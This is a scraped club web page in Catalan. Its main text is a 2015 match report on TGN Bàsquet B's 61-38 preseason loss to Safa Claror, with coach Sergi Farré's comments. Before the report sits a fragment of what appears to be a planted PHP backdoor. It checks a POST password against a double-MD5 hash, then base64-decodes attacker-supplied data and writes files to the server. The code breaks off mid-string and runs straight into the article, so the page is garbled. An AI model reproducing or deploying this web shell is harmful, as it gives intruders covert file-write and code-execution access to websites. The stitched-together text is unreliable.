function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet B perd a la pista del Safa Claror per culpa de la seva intermitència en el joc (61-38) - Tgn Bàsquet Club -

El TGN Bàsquet B perd a la pista del Safa Claror per culpa de la seva intermitència en el joc (61-38)

By
Updated: setembre 19, 2015

El TGN Bàsquet B ha tancat la seva fase de preparació d’aquesta pretemporada amb una derrota a la pista del Safa Claror (61-38). Aquest partit, el més dur que ha disputat el conjunt lila fins ara, l’enfrontava a un rival de la mateixa categoria, Primera Catalana, tot i que l’equip barceloní milita en l’altre grup. Les noies que entrena Sergi Farré van mostrar dues cares molt diferents durant tot el partit i això les va condemnar a la derrota.

Per una banda, el TGN Bàsquet B va tenir bons moments, amb concentració i intensitat en el seu joc i, per l’altra, les jugadores tarragonines van desaparèixer per moments del partit i van ser víctimes de la pressió defensiva del seu rival. La inconstància en el joc del TGN Bàsquet B va fer que les locals dominessin el matx des de l’inici. Així, amb la batuta a les seves mans, el Safa Claror va poder jugar el seu bàsquet, centrat en una defensa individual a tota la pista -tot i que anava canviant- que va provocar algunes dificultats en el joc ofensiu visitant. En els moments de concentració lila, aquesta defensa no va ser un problema però la intermitència en el joc del TGN va evitar que el domini del partit passés a mans visitants.

El resultat, molt desfavorable, va ser conseqüència d’uns pèssims últims cinc minuts. En aquell moment, la diferència no era més gran de 6 punts, però la impossibilitat de canviar la dinàmica del matx i l’empenta de les locals va acabar mostrant un marcador contundent. “Ens ha faltat més duresa defensiva i ser més constants durant tot el partit. Esperem millorar aquests aspectes en vista a l’inici de lliga de la setmana que ve contra el Manyanet”, ha dit el tècnic Sergi Farré.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *